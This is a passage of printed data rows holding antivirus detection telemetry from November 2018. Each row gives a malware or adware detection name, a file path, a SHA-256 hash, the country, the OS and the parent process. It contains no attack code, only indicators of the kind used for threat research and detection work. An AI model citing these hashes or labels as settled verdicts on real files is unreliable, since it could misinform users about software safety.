  Row(detection=Row(filename='setup.exe', filepath='c:\\program files (x86)\\installshield installation information\\{18443a58-1497-11d6-9c37-0002a51a160c}\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='904ef6cebeaf0e9872460b8d7637e040e0b38cf93d8cbf3a28cc423fef722303', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:49:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110147-b161bcee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-110147-B161BCEE', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082806-9b79d3a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7a50dcda\\AVSCAN-20181102-082637-921A2E95\\AVSCAN-20181102-082806-9B79D3A6', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='8d77d0f73874e20bd2cda1bf719dce3ed810abf989c246bb3f193324f0c91c17', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:28:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:21:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dosyalarım.exe', filepath='\\\\?\\K:\\Dosyalarım.exe', filesize=320000, name='TR/Patched.Ren.Gen.#M300.#R4976'), hash='be2e60a43d2533a585c6db1626abfab89e9c06272f03d3de6ceaec52b6de9cd0', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:36:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-004433-ae9be293', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8490c741\\AVSCAN-20181103-004403-A9ACB800\\AVSCAN-20181103-004433-AE9BE293', filesize=2560000, name='HEUR/APC.#M1.#R1'), hash='95a691e8363abbbe758b13ba865487d509685132c9464bfbad24ec1288f20d74', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:14:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a84f4b47552a14b400866d83694f9f5b6caa8f82283f82ea75b498dc65dff63c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\A84F4B47552A14B400866D83694F9F5B6CAA8F82283F82EA75B498DC65DFF63C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a84f4b47552a14b400866d83694f9f5b6caa8f82283f82ea75b498dc65dff63c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:57:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064713-7af9599d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234137-7F763213\\AVSCAN-20181102-064713-7AF9599D', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:49:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-022538-d196a3e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-022538-D196A3E0', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='b478f1a0c4eaa3f21efdeef6aceee8a7e688d44862082fac5743a19d2bb4c0ea', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:27:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='process design_practice.exe', filepath='F:\\ASANTE PRESBYTERY_LMFDP_Handouts\\process design_PRACTICE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1810432, timestamp='2018-11-02T10:38:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\iuivjmdpqfg\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.kjvwd.#M0.#R0'), hash='e6fc333e96f2bf01b233da4c04eb648168ec1f8b12f53c11b61c24579404b6c8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:40:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='change sped contabil installation.exe', filepath='C:\\Arquivos de Programas RFB\\Programas SPED\\SpedContabil\\SpedContabil_installation\\Change Sped Contabil Installation.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='a4f89cbfb38f2fe3480813d625b0ce165e6d171343b0b01815f3655f4625c9a6', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:32:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-094528-2a07f4d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_140ecc6e\\AVSCAN-20181102-094459-25BD6C20\\AVSCAN-20181102-094528-2A07F4D6', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:45:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3274010003.pif', filepath='F:\\scan-peta-wb-sp2010\\3274010\\3274010003\\3274010003.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T04:03:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='disableusbwin7.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\DisableUSBWin7.exe", filesize=64000, name='TR/Siggen.cucmw.#M1.#R1'), hash='db6f79265933c5ec30247d757b221f8d5694e189970243bede519902113fc960', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{3B9E88D2-9758-44D3-86CB-1997B79D85E1}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ca57942d852ffcdd4a83d3b3ebdbcf3a03f24273ff60857b276c0e568232abb1', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:40:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gacutil.exe', filepath='C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v8.0A\\bin\\NETFX 4.0 Tools\\x64\\gacutil.exe', filesize=172000, name='W32/Neshta.A.#M1.#R1'), hash='d46cde95733160114a1ce30d868d69b5d4e714fd9b9b0910ab8d141865c23f4f', metadata=Row(cmdline='-m:GeneralTel.dll -f:RunGeneralTelemetry  -cV 7s2Ufj7IgU2HVgcw.1.2 -SendFullTelemetry -ThrottleUtc', country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T11:14:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292f0e', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292f0e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:20:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023f1f0', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023f1f0', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:13:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ca8b8c22d41620d3d1d05f30e5c3930514f539c06452b4a5ba4689cb5dc68530', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T23:34:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:33:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290ae5', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290ae5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:38:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002932c5', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002932c5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:24:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-092513-5c5ed7ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-092513-5C5ED7CE', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:24:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T00:45:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='liveupdate360.exe', filepath='\\\\?\\C:\\360SANDBOX\\SHADOW\\Program Files (x86)\\360\\Total Security\\LiveUpdate360.exe', filesize=872000, name='W32/Neshta.A.#M1.#R1'), hash='f2b94adda8ff7f24fa6d39b3a6bc358727486df23322bd45b0dbed6850130be0', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:41:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151207-12c7304f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-151207-12C7304F', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:12:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e01e15b3b3a622259a0b60b7b4121e4fc92daa30dbb522c5a700cfb7d4cc158f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\E01E15B3B3A622259A0B60B7B4121E4FC92DAA30DBB522C5A700CFB7D4CC158F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e01e15b3b3a622259a0b60b7b4121e4fc92daa30dbb522c5a700cfb7d4cc158f', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:19:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:49:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsh730E.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T19:42:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:04:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='serial.exe', filepath='\\\\?\\C:\\Program Files\\aBusinessPlus\\SERIAL.exe', filesize=192000, name='TR/Patched.Ren.Gen.#M300.#R3807'), hash='ea102d93e8dc6ba57074ba13208d652b38148aff1e605dfe7454f396ed549e3d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:24:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='заявка_университет_итмо_горнолыжный_спорт.exe', filepath='E:\\УФКиС\\Заявки на соревнования\\Заявка_Университет_ИТМО_горнолыжный_спорт.exe', filesize=1728000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='fdcce500c3a3dc6ecfed361274dcadab3f5e41b2e542763fd77b4d71fcbd2a99', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T11:31:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fe324a1b076f47329126769fcb324957af0b28ed539d864d4cf71f8a80b6ff87', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\FE324A1B076F47329126769FCB324957AF0B28ED539D864D4CF71F8A80B6FF87', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fe324a1b076f47329126769fcb324957af0b28ed539d864d4cf71f8a80b6ff87', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:29:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f84fab65dfbd46b53fad092e8f3e303562a67e24a26f8fcb1c18b9cef54d4072', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\F84FAB65DFBD46B53FAD092E8F3E303562A67E24A26F8FCB1C18B9CEF54D4072', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f84fab65dfbd46b53fad092e8f3e303562a67e24a26f8fcb1c18b9cef54d4072', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:26:41Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='engine.dll', filepath='C:\\Program Files\\Counter-Strike Global Offensive\\bin\\engine.dll', filesize=5888000, name='W32/Ramnit.CD.#M1.#R1'), hash='1959aade57a9d67fa763d5693474ad05180fdfcd35276ae83ea13800b012d0e1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T16:35:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160028-f051c51f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160028-F051C51F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='4ea270655c6133e002b1208417508d49616245c291894ca12c02324374a11847', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2640896, timestamp='2018-11-02T13:06:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1687483a29c55e00b2e6b3f69b81db32acf7df9c79b07a83f3f72067d84ebb31.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.available\\Avira\\1687483A29C55E00B2E6B3F69B81DB32ACF7DF9C79B07A83F3F72067D84EBB31.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1687483a29c55e00b2e6b3f69b81db32acf7df9c79b07a83f3f72067d84ebb31', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:41:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:08:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101115-b42c504e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-101013-A70C872B\\AVSCAN-20181102-101115-B42C504E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:11:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='048d987d-f4b7-3a9f-a71e-eca471df56ac.exe', filepath='G:\\{f8869ead-7c8f-ed4f-8986-82d675e28e53}\\048d987d-f4b7-3a9f-a71e-eca471df56ac.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='4bb35ea756d240fbf25310581d51df02fca4299705c9e4abd48f0d2b601df2df', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1879152, timestamp='2018-11-02T05:15:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='riched32.dll', filepath='\\\\?\\C:\\Windows\\SysWOW64\\MUI\\S-1-5-86\\Riched32.dll', filesize=256000, name='TR/AD.CoinLoader.B.#M1.#R1'), hash='4af82a3625f018fb014888948f76a681bbfe1b2bb6624b2002f06142f0712333', metadata=Row(cmdline=None, country='UZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:26:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2411048, timestamp='2018-11-02T14:50:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5ebbb585a81c38fe104d0ae7180925a44cfbf342046c535f2cb8c51649c291fa', filepath='C:\\Users\\X\\Downloads\\t\\ D_\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-26\\5EBBB585A81C38FE104D0AE7180925A44CFBF342046C535F2CB8C51649C291FA', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5ebbb585a81c38fe104d0ae7180925a44cfbf342046c535f2cb8c51649c291fa', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-26.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-24.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-25.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:32:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cat.exe', filepath='C:\\Users\\X\\Documents\\National Instruments\\Circuit Design Suite 12.0\\codemodl\\USER\\CAT.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='0d0649f7dfc5dd8d852dc8a00b5509ac9c3e9745261a2930cd73d13e80072b53', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe2_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T06:20:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-173047-cac4f163', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e331b0a2\\AVSCAN-20181102-172315-78C6CC57\\AVSCAN-20181102-173047-CAC4F163', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T22:30:50Z'), dt=datetime.date(2018, 11, 2)),
